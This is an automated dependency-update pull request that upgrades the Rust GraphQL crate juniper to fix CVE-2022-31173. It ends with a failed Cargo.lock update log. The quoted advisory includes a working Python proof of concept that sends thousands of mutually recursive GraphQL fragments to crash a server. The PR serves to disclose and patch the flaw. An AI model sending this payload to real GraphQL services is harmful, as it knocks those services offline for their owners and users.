Update Rust crate juniper to 0.15.0 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Type	Update	Change
juniper (source)	dependencies	minor	0.14.1 -> 0.15.0

GitHub Vulnerability Alerts

CVE-2022-31173

GraphQL behaviour

Nested fragment in GraphQL might be quite hard to handle depending on the implementation language.
Some language support natively a max recursion depth. However, on most compiled languages, you should add a threshold of recursion.

# Infinite loop example
query {
    ...a
}

fragment a on Query {
    ...b
}

fragment b on Query {
    ...a
}

POC TLDR

With max_size being the number of nested fragment generated.
At max_size=7500, it should instantly raise:

However, with a lower size, you will overflow the memory after some iterations.

Reproduction steps (Juniper)

git clone https://github.com/graphql-rust/juniper.git
cd juniper

Save this POC as poc.py

import requests
import time
import json
from itertools import permutations

print('=== Fragments POC ===')

url = 'http://localhost:8080/graphql'

max_size = 7500
perms = [''.join(p) for p in permutations('abcefghijk')]
perms = perms[:max_size]

fragment_payloads = ''
for i, perm in enumerate(perms):
    next_perm = perms[i+1] if i < max_size-1 else perms[0]
    fragment_payloads += f'fragment {perm} on Query' + '{' f'...{next_perm}' + '}'

payload = {'query':'query{\n  ...' + perms[0] + '\n}' + fragment_payloads,'variables':{},'operationName':None}

headers = {
  'Content-Type': 'application/json',
}

try:
    response = requests.request('POST', url, headers=headers, json=payload)
    print(response.text)
except requests.exceptions.ConnectionError:
    print('Connection closed, POC worked.')

cargo run
[in separate shell] python3 poc.py

Credits

@​Escape-Technologies

@​c3b5aw
@​MdotTIM
@​karimhreda

---

Release Notes

graphql-rust/juniper (juniper)

v0.15.10: juniper 0.15.10

Compare Source

Changelog

v0.15.9

Compare Source

v0.15.8

Compare Source

v0.15.7

Compare Source

v0.15.6

Compare Source

v0.15.5

Compare Source

v0.15.4

Compare Source

v0.15.3

Compare Source

v0.15.2

Compare Source

v0.15.1

Compare Source

v0.15.0

Compare Source

v0.14.2

Compare Source

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Mend Renovate. View repository job log here.

[renovate]

⚠ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: Cargo.lock

Command failed: docker run --rm --name=renovate_a_sidecar --label=renovate_a_child --memory=3584m -v "/tmp/worker/6db155/780fbb/repos/github/bodymindarts/risq":"/tmp/worker/6db155/780fbb/repos/github/bodymindarts/risq" -v "/tmp/worker/6db155/780fbb/cache":"/tmp/worker/6db155/780fbb/cache" -e CONTAINERBASE_CACHE_DIR -w "/tmp/worker/6db155/780fbb/repos/github/bodymindarts/risq" ghcr.io/containerbase/sidecar:9.28.0 bash -l -c "install-tool rust 1.74.0 && cargo update --config net.git-fetch-with-cli=true --manifest-path Cargo.toml --workspace && cargo update --config net.git-fetch-with-cli=true --manifest-path Cargo.toml --package [email protected] --precise 0.15.10"
    Updating crates.io index
      Adding async-trait v0.1.74
      Adding autocfg v1.1.0
      Adding base64 v0.12.3
      Adding bson v1.0.0
      Adding derive_utils v0.11.2
      Adding futures v0.3.29
      Adding futures-channel v0.3.29
      Adding futures-core v0.3.29
      Adding futures-enum v0.1.17
      Adding futures-io v0.3.29
      Adding futures-sink v0.3.29
      Adding futures-task v0.3.29
      Adding futures-util v0.3.29
      Adding graphql-parser v0.3.0
      Adding juniper v0.15.11
      Adding juniper_codegen v0.15.9
      Adding md5 v0.6.1
      Adding pin-project-lite v0.2.13
      Adding pin-utils v0.1.0
      Adding proc-macro-error v1.0.4
      Adding proc-macro-error-attr v1.0.4
    Updating proc-macro2 v1.0.21 -> v1.0.70
    Updating quote v1.0.2 -> v1.0.33
      Adding smartstring v1.0.1
      Adding static_assertions v1.1.0
    Removing syn v1.0.40
      Adding syn v1.0.109
      Adding syn v2.0.39
      Adding thiserror v1.0.50
      Adding thiserror-impl v1.0.50
      Adding unicode-ident v1.0.12
      Adding version_check v0.9.4
    Updating crates.io index
error: failed to select a version for the requirement `juniper = "^0.14"`
candidate versions found which didn't match: 0.15.10
location searched: crates.io index
required by package `juniper-from-schema v0.5.1`
    ... which satisfies dependency `juniper-from-schema = "^0.5.1"` (locked to 0.5.1) of package `risq v0.4.2-dev (/tmp/worker/6db155/780fbb/repos/github/bodymindarts/risq)`
perhaps a crate was updated and forgotten to be re-vendored?